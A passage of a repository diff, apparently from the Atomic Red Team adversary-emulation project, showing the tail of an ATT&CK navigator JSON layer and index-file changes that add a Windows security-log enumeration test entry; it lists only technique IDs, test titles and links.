Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":8,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":45,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":42,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":13,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":30,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":15,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":118,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 170fd6d2cd..2a69beb328 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -1724,6 +1724,7 @@ discovery,T1049,System Network Connections Discovery,3,"System Network Connectio discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh discovery,T1654,Log Enumeration,1,Get-EventLog To Enumerate Windows Security Log,a9030b20-dd4b-4405-875e-3462c6078fdc,powershell +discovery,T1654,Log Enumeration,2,Enumerate Windows Security Log via WevtUtil,fef0ace1-3550-4bf1-a075-9fea55a778dd,command_prompt discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell 
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 5856731b37..e6fd7d3be5 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -1140,6 +1140,7 @@ discovery,T1049,System Network Connections Discovery,1,System Network Connection discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell discovery,T1654,Log Enumeration,1,Get-EventLog To Enumerate Windows Security Log,a9030b20-dd4b-4405-875e-3462c6078fdc,powershell +discovery,T1654,Log Enumeration,2,Enumerate Windows Security Log via WevtUtil,fef0ace1-3550-4bf1-a075-9fea55a778dd,command_prompt discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index fd953ca94c..98a89eb663 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -2381,6 +2381,7 @@ - Atomic Test #1: AWS S3 Enumeration [iaas:aws] - [T1654 Log Enumeration](../../T1654/T1654.md) - Atomic Test #1: Get-EventLog To Enumerate Windows Security Log [windows] + - Atomic Test #2: Enumerate Windows Security Log via WevtUtil [windows] - T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1057 Process Discovery](../../T1057/T1057.md) - Atomic Test #1: Process Discovery - ps [linux, macos] 
